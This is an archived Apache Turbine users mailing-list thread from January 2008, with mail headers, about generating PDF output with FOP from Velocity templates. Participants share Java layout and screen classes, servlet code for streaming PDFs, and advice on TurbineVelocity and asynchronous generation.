earth.courcoux.biz (Postfix) with ESMTP id 933651D8901 for <[email protected]>; Fri, 18 Jan 2008 10:46:31 +0000 (GMT) Message-ID: <[email protected]> Date: Fri, 18 Jan 2008 10:02:52 +0000 From: Peter Courcoux <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070728) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: Using Turbine's tools for assembling PDF output (using FOP): how to? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi,Alexander, see http://wiki.apache.org/turbine/Turbine2/VelocityOnlyLayout Regards, Peter Alexander Zimmer wrote: > Hello list, > > > > I am trying to extend an existing Turbine application by a "Download" > link which should result in a PDF file being served, containing the same > data as in the screen template counterpart. > > > > Take a video database for instance, I can browse through the video > titles and have a look at specific videos by looking at their > "Details.vm" screen template which would output detail information. > Alternatively, I would like to offer a "Download as PDf" link which > should resemble the screen output, but was assembled via FOP, presenting > the video details as a sort of "video data sheet". > > > > With regards to the PDF generation, I am presented with the same > problems as in the course of the template screen generation: > > - using the l10n mechanism > > - possibly using other pull tools > > > > Therefore it would be very reasonable to use these template services in > a page which does NOT output to the HTTPServlet-request-OutputStream, > but instead is able to > > - set a MIME-Type > > - gather the output of the template (in which I can use the > beloved set of pull tools, e.g. for internationalization), which > delivers a FO String > > - pipe the generated FO String (or Stream) through a FO->PDF > converter > > - stream the PDF byte stream into the servlet output > > > > How can I achieve this in Turbine? The FO->PDF conversion poses no > problem (in fact: is already working), but how can I tell Turbine to use > the template mechanism with all pull tools but capturing the output in > order to send it into the FO->PDF converter and stream it back? > > > > I suppose, this has to be a special Page class capable of doing this. > Could you point me in the right direction? > > > > TIA, > > Alex > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jan 18 15:26:57 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73055 invoked from network); 18 Jan 2008 15:26:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2008 15:26:57 -0000 Received: (qmail 82058 invoked by uid 500); 18 Jan 2008 15:26:46 -0000 Delivered-To: [email protected] Received: (qmail 82041 invoked by uid 500); 18 Jan 2008 15:26:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 82032 invoked by uid 99); 18 Jan 2008 15:26:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 07:26:46 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO dmz-scan-01.unycom.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 15:26:31 +0000 Received: from dmz-scan-01.unycom.com (localhost [161.129.204.104]) by localhost.unycom.com (Postfix) with ESMTP id 3B7F690C510 for <[email protected]>; Fri, 18 Jan 2008 16:26:02 +0100 (CET) Received: from uny-srv-ex.unycom.com (uny-srv-ex.unycom.com [161.129.204.104])by dmz-scan-01.unycom.com (Postfix) with ESMTP id 2F1BF90C50Afor <[email protected]>; Fri, 18 Jan 2008 16:26:02 +0100 (CET) X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Subject: AW: Using Turbine's tools for assembling PDF output (using FOP): how to? Date: Fri, 18 Jan 2008 16:26:23 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Using Turbine's tools for assembling PDF output (using FOP): how to? Thread-Index: AchZ5JspZQAnS43dSK61VHjbDTQjJAAAD+hw From: "Alexander Zimmer" <[email protected]> To: "Turbine Users List" <[email protected]> X-imss-version: 2.049 X-imss-result: Passed X-imss-scanInfo: M:P L:E SM:0 X-imss-tmaseResult: TT:0 TS:0.0000 TC:00 TRN:0 TV:5.0.1023(15676.000) X-imss-scores: Clean:85.07737 C:2 M:3 S:5 R:5 X-imss-settings: Baseline:1 C:1 M:1 S:1 R:1 (0.0000 0.0000) X-Virus-Checked: Checked by ClamAV on apache.org Thank you both for your answers.=20 Anyway, I just would like to stress that the conversion FO->PDF and the = streaming (via a RawScreen-like Screen) is not a problem and is already = solved.=20 What I do not know (yet) is, how I can use Velocity plus all the nice = Turbine pull tools for the Velocity template to assemble the FO input, = such a template would look just like this (as you can see, a valid FO = file, except the VTL sequences, which should be taken care of by = Velocity): <?xml version=3D"1.0" encoding=3D"UTF-8"?> <fo:root xmlns:fo=3D"http://www.w3.org/1999/XSL/Format"> <fo:layout-master-set> <fo:simple-page-master master-name=3D"simpleA4" = page-height=3D"29.7cm" page-width=3D"21cm" margin-top=3D"2cm" = margin-bottom=3D"2cm" margin-left=3D"2cm" margin-right=3D"2cm"> <fo:region-body/> </fo:simple-page-master> </fo:layout-master-set> <fo:page-sequence master-reference=3D"simpleA4"> <fo:flow flow-name=3D"xsl-region-body"> <fo:block>Hello World, my name is $!{name}!</fo:block> #foreach ($entry in $names) <fo:block>Next name: $entry.Firstname $entry.Lastname</fo:block> #end </fo:flow> </fo:page-sequence> </fo:root> How can I use template functionality? The problem involved are: 1. I want to use the Velocity engine and capture its output in a = String/ByteArray. The output will be a valid FO file. 2. I want to be able to use all (at least: some) pull tools Turbine = provides for screen templates I think that I've solved the other problems (how to do the streaming, = how to convert into PDF, ...). I try to dive into the VelocityOnlyLayout (as Peter Courcoux pointed = out), but if you have additional clues for me, I would be very happy to = hear from you! Cheers, Alex -----Urspr=FCngliche Nachricht----- Von: Jeffery Painter [mailto:[email protected]]=20 Gesendet: Freitag, 18. J=E4nner 2008 15:21 An: Alexander Zimmer Betreff: Re: Using Turbine's tools for assembling PDF output (using = FOP): how to? I haven't looked at this stuff in quite some time, but I had posted a PdfScreen that might give you a start on how to do things. http://kiasoft.com/opensource/PdfScreen.java I was using it with the iText library back in the day, but I believe = your options are more varied now. http://www.lowagie.com/iText/ good luck! --=20 Jeffery Painter Knowledge Engineer Semantic Technologies Group Statistical and Quantitative Sciences GlaxoSmithKline Research and Development http://www4.ncsu.edu/~jlpaint2/ > Hello list, > > > > I am trying to extend an existing Turbine application by a "Download" > link which should result in a PDF file being served, containing the = same > data as in the screen template counterpart. > > > > Take a video database for instance, I can browse through the video > titles and have a look at specific videos by looking at their > "Details.vm" screen template which would output detail information. > Alternatively, I would like to offer a "Download as PDf" link which > should resemble the screen output, but was assembled via FOP, = presenting > the video details as a sort of "video data sheet". > > > > With regards to the PDF generation, I am presented with the same > problems as in the course of the template screen generation: > > - using the l10n mechanism > > - possibly using other pull tools > > > > Therefore it would be very reasonable to use these template services = in > a page which does NOT output to the HTTPServlet-request-OutputStream, > but instead is able to > > - set a MIME-Type > > - gather the output of the template (in which I can use the > beloved set of pull tools, e.g. for internationalization), which > delivers a FO String > > - pipe the generated FO String (or Stream) through a FO->PDF > converter > > - stream the PDF byte stream into the servlet output > > > > How can I achieve this in Turbine? The FO->PDF conversion poses no > problem (in fact: is already working), but how can I tell Turbine to = use > the template mechanism with all pull tools but capturing the output in > order to send it into the FO->PDF converter and stream it back? > > > > I suppose, this has to be a special Page class capable of doing this. > Could you point me in the right direction? > > > > TIA, > > Alex > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jan 18 15:51:44 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83013 invoked from network); 18 Jan 2008 15:51:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2008 15:51:44 -0000 Received: (qmail 17954 invoked by uid 500); 18 Jan 2008 15:51:33 -0000 Delivered-To: [email protected] Received: (qmail 17855 invoked by uid 500); 18 Jan 2008 15:51:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 17846 invoked by uid 99); 18 Jan 2008 15:51:33 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 07:51:33 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DATE_IN_PAST_03_06,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.smythco.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 15:51:19 +0000 Received: from mail-stp.smythco.com (mail-stp.smythco.com [161.129.204.104]) by mail.smythco.com (8.14.1/8.14.1) with ESMTP id m0IFpAB7022808 for <[email protected]>; Fri, 18 Jan 2008 09:51:10 -0600 Received: from syokanov.stp.smythco.com (account [email protected] [161.129.204.104] verified) by mail-stp.smythco.com (CommuniGate Pro SMTP 5.1.13) with ESMTPA id 17269417 for [email protected]; Fri, 18 Jan 2008 09:51:07 -0600 Message-ID: <[email protected]> Date: Fri, 18 Jan 2008 06:40:49 -0600 From: Steve Yokanovich <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20071115) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: AW: Using Turbine's tools for assembling PDF output (using FOP): how to? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org We have a solution that sounds similar. We are not a high volume site so I am not sure how scalable this is since it creates a new Fop with each request. We extended VelocityOnlyLayout to create a PdfLayout: public class PdfLayout extends VelocityOnlyLayout { FopFactory fopFactory = FopFactory.newInstance(); TransformerFactory tFactory = TransformerFactory.newInstance(); Log logger = LogFactory.getLog(PdfLayout.class); public void doBuild(RunData data) throws Exception { /* Screen string will store the XSL-FO */ String screenString = ""; /* * First, generate the screen and put the results into a string */ ConcreteElement results = ScreenLoader.getInstance().eval(data, data.getScreen()); if (results != null) screenString = results.toString(); /** * Get the response object and set content type for PDF */ HttpServletResponse response = data.getResponse(); ByteArrayOutputStream out = new ByteArrayOutputStream(); /** * Get a reader and instantiate the PDF Driver */ StringReader reader = new StringReader(screenString); Fop fop = fopFactory.newFop(MimeConstants.MIME_PDF, out); try { /** * Render the document and write to the response */ Source source = new StreamSource(reader); Result res = new SAXResult(fop.getDefaultHandler()); Transformer transformer = tFactory.newTransformer(); transformer.transform(source, res); byte[] byteContent = out.toByteArray(); response.setContentType("application/pdf"); response.setContentLength(byteContent.length); response.getOutputStream().write(byteContent); response.getOutputStream().flush(); } catch (IllegalArgumentException e) { logger.error(e.getMessage()); e.printStackTrace(); } catch (TransformerException e) { // Attempt to send the XSL-FO back to the browser for troubleshooting. response.setContentType("text/xml"); PrintWriter writer = response.getWriter(); writer.print(screenString.toString()); writer.flush(); out.close(); logger.error("FOP Exception in PDFLayout "+ e.getMessage()); } finally { out.close(); } } } Here is our PdfScreen: /** * This screen incorporates the security function (isAuthorized) * from VelocitySecureScreen, the only difference being the getLayout method, which returns PdfLayout if the user is authenticated. * See PdfLayout for the actual rendering of the PDF document */ public class PdfScreen extends VelocitySecureScreen { public String getLayout(RunData data) { boolean ok = false; String rv = null; try { ok = this.isAuthorized(data); } catch (Exception e) { } if (ok) { rv = "PdfLayout"; } else { rv = "LoginLayout"; data.setLayoutTemplate("/Login.vm"); } return rv; } } Now whenever we need a PDF we extend PdfScreen and create the xsl-fo template. Let me know if this is what you were looking for. Steve Yokanovich Alexander Zimmer wrote: > Thank you both for your answers. > Anyway, I just would like to stress that the conversion FO->PDF and the streaming (via a RawScreen-like Screen) is not a problem and is already solved. > What I do not know (yet) is, how I can use Velocity plus all the nice Turbine pull tools for the Velocity template to assemble the FO input, such a template would look just like this (as you can see, a valid FO file, except the VTL sequences, which should be taken care of by Velocity): > <?xml version="1.0" encoding="UTF-8"?> > <fo:root xmlns:fo="http://www.w3.org/1999/XSL/Format"> > <fo:layout-master-set> > <fo:simple-page-master master-name="simpleA4" page-height="29.7cm" page-width="21cm" margin-top="2cm" margin-bottom="2cm" margin-left="2cm" margin-right="2cm"> > <fo:region-body/> > </fo:simple-page-master> > </fo:layout-master-set> > <fo:page-sequence master-reference="simpleA4"> > <fo:flow flow-name="xsl-region-body"> > <fo:block>Hello World, my name is $!{name}!</fo:block> > #foreach ($entry in $names) > <fo:block>Next name: $entry.Firstname $entry.Lastname</fo:block> > #end > </fo:flow> > </fo:page-sequence> > </fo:root> > How can I use template functionality? The problem involved are: > 1. I want to use the Velocity engine and capture its output in a String/ByteArray. The output will be a valid FO file. > 2. I want to be able to use all (at least: some) pull tools Turbine provides for screen templates > I think that I've solved the other problems (how to do the streaming, how to convert into PDF, ...). > I try to dive into the VelocityOnlyLayout (as Peter Courcoux pointed out), but if you have additional clues for me, I would be very happy to hear from you! > > Cheers, > Alex > > > -----Ursprüngliche Nachricht----- > Von: Jeffery Painter [mailto:[email protected]] > Gesendet: Freitag, 18. Jänner 2008 15:21 > An: Alexander Zimmer > Betreff: Re: Using Turbine's tools for assembling PDF output (using FOP): how to? > > > I haven't looked at this stuff in quite some time, but I had posted > a PdfScreen that might give you a start on how to do things. > > http://kiasoft.com/opensource/PdfScreen.java > > I was using it with the iText library back in the day, but I believe your > options are more varied now. > > http://www.lowagie.com/iText/ > > good luck! > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jan 18 17:42:06 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22953 invoked from network); 18 Jan 2008 17:42:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2008 17:42:06 -0000 Received: (qmail 70004 invoked by uid 500); 18 Jan 2008 17:41:55 -0000 Delivered-To: [email protected] Received: (qmail 69991 invoked by uid 500); 18 Jan 2008 17:41:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 37362 invoked by uid 99); 18 Jan 2008 17:19:40 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Content-class: urn:content-classes:message Subject: RE: AW: Using Turbine's tools for assembling PDF output (using FOP): how to? MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Fri, 18 Jan 2008 11:19:23 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Message-ID: <[email protected]> In-Reply-To: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: AW: Using Turbine's tools for assembling PDF output (using FOP): how to? thread-index: AchZ6gcMaRkWBRwbSUyTkh44QluK6gACzyyQ From: "Tony Oslund" <[email protected]> To: "Turbine Users List" <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Steve is correct, this may not scale well.... You may want to make your PDF generation asynchronous (perform the = generation outside of scope of your app server). Partially for = performance reasons, and especially for memory useage. I have a secondary (asynchronous) process that is signaled to generate = the pdf... it generates it... and signals back that the pdf is ready for = use. The app then uses the code (see my other response) to load up the = pdf and send it back. =20 The best thing about this approach is your app server is not bogged down = just because you are generating pdf's. It scales much better. Also you = then have the option of serving the pdf back either through your app = server or directly through an http server (which is much more = efficient). I currently have sites serving it up (for different = reasons) each way, and they both work well. Best of luck. -----Original Message----- From: Steve Yokanovich [mailto:[email protected]]=20 Sent: Friday, January 18, 2008 6:41 AM To: Turbine Users List Subject: Re: AW: Using Turbine's tools for assembling PDF output (using = FOP): how to? We have a solution that sounds similar. We are not a high volume site so = I am not sure how scalable this is since it creates a new Fop with=20 each request. We extended VelocityOnlyLayout to create a PdfLayout: public class PdfLayout extends VelocityOnlyLayout { FopFactory fopFactory =3D FopFactory.newInstance(); TransformerFactory tFactory =3D TransformerFactory.newInstance(); Log logger =3D LogFactory.getLog(PdfLayout.class); public void doBuild(RunData data) throws Exception { /* Screen string will store the XSL-FO */ String screenString =3D ""; /* * First, generate the screen and put the results into a string */ ConcreteElement results =3D = ScreenLoader.getInstance().eval(data,=20 data.getScreen()); if (results !=3D null) screenString =3D results.toString(); /** * Get the response object and set content type for PDF */ HttpServletResponse response =3D data.getResponse(); ByteArrayOutputStream out =3D new ByteArrayOutputStream(); /** * Get a reader and instantiate the PDF Driver */ StringReader reader =3D new StringReader(screenString); Fop fop =3D fopFactory.newFop(MimeConstants.MIME_PDF, out); try { /** * Render the document and write to the response */ Source source =3D new StreamSource(reader); Result res =3D new SAXResult(fop.getDefaultHandler()); Transformer transformer =3D tFactory.newTransformer(); transformer.transform(source, res); byte[] byteContent =3D out.toByteArray(); response.setContentType("application/pdf"); response.setContentLength(byteContent.length); response.getOutputStream().write(byteContent); response.getOutputStream().flush(); } catch (IllegalArgumentException e) { logger.error(e.getMessage()); e.printStackTrace(); } catch (TransformerException e) { // Attempt to send the XSL-FO back to the browser for=20 troubleshooting. response.setContentType("text/xml"); PrintWriter writer =3D response.getWriter(); writer.print(screenString.toString()); writer.flush(); out.close(); logger.error("FOP Exception in PDFLayout "+=20 e.getMessage()); } finally { out.close(); } } } Here is our PdfScreen: /** * This screen incorporates the security function (isAuthorized) * from VelocitySecureScreen, the only difference being the=20 getLayout method, which returns PdfLayout if the user is authenticated. * See PdfLayout for the actual rendering of the PDF document */ public class PdfScreen extends VelocitySecureScreen { public String getLayout(RunData data) { boolean ok =3D false; String rv =3D null; try { ok =3D this.isAuthorized(data); } catch (Exception e) { } if (ok) { rv =3D "PdfLayout"; } else { rv =3D "LoginLayout"; data.setLayoutTemplate("/Login.vm"); } return rv; } } Now whenever we need a PDF we extend PdfScreen and create the xsl-fo=20 template. Let me know if this is what you were looking for. Steve Yokanovich Alexander Zimmer wrote: > Thank you both for your answers.=20 > Anyway, I just would like to stress that the conversion FO->PDF and = the streaming (via a RawScreen-like Screen) is not a problem and is = already solved.=20 > What I do not know (yet) is, how I can use Velocity plus all the nice = Turbine pull tools for the Velocity template to assemble the FO input, = such a template would look just like this (as you can see, a valid FO = file, except the VTL sequences, which should be taken care of by = Velocity): > <?xml version=3D"1.0" encoding=3D"UTF-8"?> > <fo:root xmlns:fo=3D"http://www.w3.org/1999/XSL/Format"> > <fo:layout-master-set> > <fo:simple-page-master master-name=3D"simpleA4" = page-height=3D"29.7cm" page-width=3D"21cm" margin-top=3D"2cm" = margin-bottom=3D"2cm" margin-left=3D"2cm" margin-right=3D"2cm"> > <fo:region-body/> > </fo:simple-page-master> > </fo:layout-master-set> > <fo:page-sequence master-reference=3D"simpleA4"> > <fo:flow flow-name=3D"xsl-region-body"> > <fo:block>Hello World, my name is $!{name}!</fo:block> > #foreach ($entry in $names) > <fo:block>Next name: $entry.Firstname = $entry.Lastname</fo:block> > #end > </fo:flow> > </fo:page-sequence> > </fo:root> > How can I use template functionality? The problem involved are: > 1. I want to use the Velocity engine and capture its output in a = String/ByteArray. The output will be a valid FO file. > 2. I want to be able to use all (at least: some) pull tools Turbine = provides for screen templates > I think that I've solved the other problems (how to do the streaming, = how to convert into PDF, ...). > I try to dive into the VelocityOnlyLayout (as Peter Courcoux pointed = out), but if you have additional clues for me, I would be very happy to = hear from you! >=20 > Cheers, > Alex >=20 >=20 > -----Urspr=FCngliche Nachricht----- > Von: Jeffery Painter [mailto:[email protected]]=20 > Gesendet: Freitag, 18. J=E4nner 2008 15:21 > An: Alexander Zimmer > Betreff: Re: Using Turbine's tools for assembling PDF output (using = FOP): how to? >=20 >=20 > I haven't looked at this stuff in quite some time, but I had posted > a PdfScreen that might give you a start on how to do things. >=20 > http://kiasoft.com/opensource/PdfScreen.java >=20 > I was using it with the iText library back in the day, but I believe = your > options are more varied now. >=20 > http://www.lowagie.com/iText/ >=20 > good luck! >=20 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jan 18 17:42:18 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23062 invoked from network); 18 Jan 2008 17:42:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2008 17:42:18 -0000 Received: (qmail 70606 invoked by uid 500); 18 Jan 2008 17:42:07 -0000 Delivered-To: [email protected] Received: (qmail 70585 invoked by uid 500); 18 Jan 2008 17:42:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 8947 invoked by uid 99); 18 Jan 2008 16:54:59 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Content-class: urn:content-classes:message Subject: RE: Using Turbine's tools for assembling PDF output (using FOP): how to? MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Date: Fri, 18 Jan 2008 10:54:42 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Message-ID: <[email protected]> In-Reply-To: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Using Turbine's tools for assembling PDF output (using FOP): how to? thread-index: AchZtpxsncOtVtokQgCtBUhHq+UCgAAOrQrw From: "Tony Oslund" <[email protected]> To: "Turbine Users List" <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org You might also want to look at a few products, pd4ml, and htmldoc, for performing html to pdf generation. Pd4ml is very nice in that it allows for easy multi-language capabilities (easy font embedding), and it is entirely written in java. I noticed that you are already using FO (FOP or something like it). Personally I have found that my report development cycle is much shorter using html to pdf rather than xsl/fo. Anyways, I have been doing the following to send pdf content byte[] pageContent =3D null; ... populate pageContent with something ServletOutputStream outputStream =3D null; try { HttpServletResponse response =3D data.getResponse(); outputStream =3D response.getOutputStream(); response.setContentType("application/pdf"); response.setHeader("Content-disposition","filename=3D" + pageId + ".pdf"); response.setIntHeader("Content-length", pageContent.length); outputStream.write(pageContent, 0, pageContent.length); outputStream.flush(); } catch (java.io.IOException ex) {} finally { if (outputStream !=3D null) { try { outputStream.close(); } catch (Exception e) {} } } -----Original Message----- From: Alexander Zimmer [mailto:[email protected]]=20 Sent: Friday, January 18, 2008 3:44 AM To: Turbine Users List Subject: Using Turbine's tools for assembling PDF output (using FOP): how to? Hello list, =20 I am trying to extend an existing Turbine application by a "Download" link which should result in a PDF file being served, containing the same data as in the screen template counterpart. =20 Take a video database for instance, I can browse through the video titles and have a look at specific videos by looking at their "Details.vm" screen template which would output detail information. Alternatively, I would like to offer a "Download as PDf" link which should resemble the screen output, but was assembled via FOP, presenting the video details as a sort of "video data sheet". =20 With regards to the PDF generation, I am presented with the same problems as in the course of the template screen generation: - using the l10n mechanism - possibly using other pull tools =20 Therefore it would be very reasonable to use these template services in a page which does NOT output to the HTTPServlet-request-OutputStream, but instead is able to=20 - set a MIME-Type - gather the output of the template (in which I can use the beloved set of pull tools, e.g. for internationalization), which delivers a FO String - pipe the generated FO String (or Stream) through a FO->PDF converter - stream the PDF byte stream into the servlet output =20 How can I achieve this in Turbine? The FO->PDF conversion poses no problem (in fact: is already working), but how can I tell Turbine to use the template mechanism with all pull tools but capturing the output in order to send it into the FO->PDF converter and stream it back? =20 I suppose, this has to be a special Page class capable of doing this. Could you point me in the right direction? =20 TIA, Alex --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jan 19 17:42:18 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52934 invoked from network); 19 Jan 2008 17:42:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jan 2008 17:42:18 -0000 Received: (qmail 6880 invoked by uid 500); 19 Jan 2008 17:42:07 -0000 Delivered-To: [email protected] Received: (qmail 6867 invoked by uid 500); 19 Jan 2008 17:42:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 6858 invoked by uid 99); 19 Jan 2008 17:42:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Jan 2008 09:42:07 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO outmail129153.authsmtp.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Jan 2008 17:41:53 +0000 Received: from outmail128175.authsmtp.net (outmail128175.authsmtp.net [161.129.204.104]) by punt2.authsmtp.com (8.13.8/8.13.8/Kp) with ESMTP id m0JHfkW3023124 for <[email protected]>; Sat, 19 Jan 2008 17:41:46 GMT Received: from [161.129.204.104] (p57AB1502.dip0.t-ipconnect.de [161.129.204.104]) (authenticated bits=0) by mail.authsmtp.com (8.13.8/8.13.8/Kp) with ESMTP id m0JHfiBT095551 for <[email protected]>; Sat, 19 Jan 2008 17:41:45 GMT Message-ID: <[email protected]> Date: Sat, 19 Jan 2008 18:41:43 +0100 From: Thomas Vandahl <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20071031) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: AW: Using Turbine's tools for assembling PDF output (using FOP): how to? References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 0.95.6 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Server-Quench: cd880245-c6b5-11dc-9554-001185d377ca X-AuthRoute: OCdyaAgQClZJUiwT EioPDCIGTh8qMABX DAUrMRZAKlsPWEJY Kk9RLlcVN0cTUwgI HBxaBUtWUF15SWJy YQ5QZwFYLEJJQQRt UVZLQ0xQCwdtHhxP Wx5kKk8rBWFGcXt1 YEcsX3dZVAopIU51 QkxQEHBVYzVldWEe BBNFfgZRdB5Kfh5E YlUrV3QKMjRJBC9q VyYMbXgMJjRZJ2xp XxsHLFQfDl1DAjk7 QwtKEzI1VUQeXCg2 JRgnLFFUJGo/ekIv LUM8RRpYLgQTDAIW MWZ1QX07b1kGWGI3 ClQy X-Authentic-SMTP: 61633138303539.squirrel.dmpriest.net.uk:787/Kp X-Report-SPAM: If SPAM / abuse - report it at: http://www.authsmtp.com/abuse X-Virus-Status: No virus detected - but ensure you scan with your own anti-virus system! X-Virus-Checked: Checked by ClamAV on apache.org Alexander Zimmer wrote: > How can I use template functionality? The problem involved are: > 1. I want to use the Velocity engine and capture its output in a String/ByteArray. The output will be a valid FO file. > 2. I want to be able to use all (at least: some) pull tools Turbine provides for screen templates > I think that I've solved the other problems (how to do the streaming, how to convert into PDF, ...). > I try to dive into the VelocityOnlyLayout (as Peter Courcoux pointed out), but if you have additional clues for me, I would be very happy to hear from you! You have TurbineVelocity at your disposal. TurbineVelocity.handleRequest(Context context, String template) is probably what you want. The service is used by Turbine itself so the Velocity engine used is completely configured and ready to use. The service will provide you with a new context (TurbineVelocity.getContext(RunData data)) which is already pre-populated with all the pull tools you configured, but you can also pass it an existing, pre-populated context. Don't forget to call TurbineVelocity.requestFinished() when you're done. Bye, Thomas. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jan 21 13:59:05 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10942 invoked from network); 21 Jan 2008 13:59:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jan 2008 13:59:05 -0000 Received: (qmail 75686 invoked by uid 500); 21 Jan 2008 13:58:54 -0000 Delivered-To: [email protected] Received: (qmail 75673 invoked by uid 500); 21 Jan 2008 13:58:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 75664 invoked by uid 99); 21 Jan 2008 13:58:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 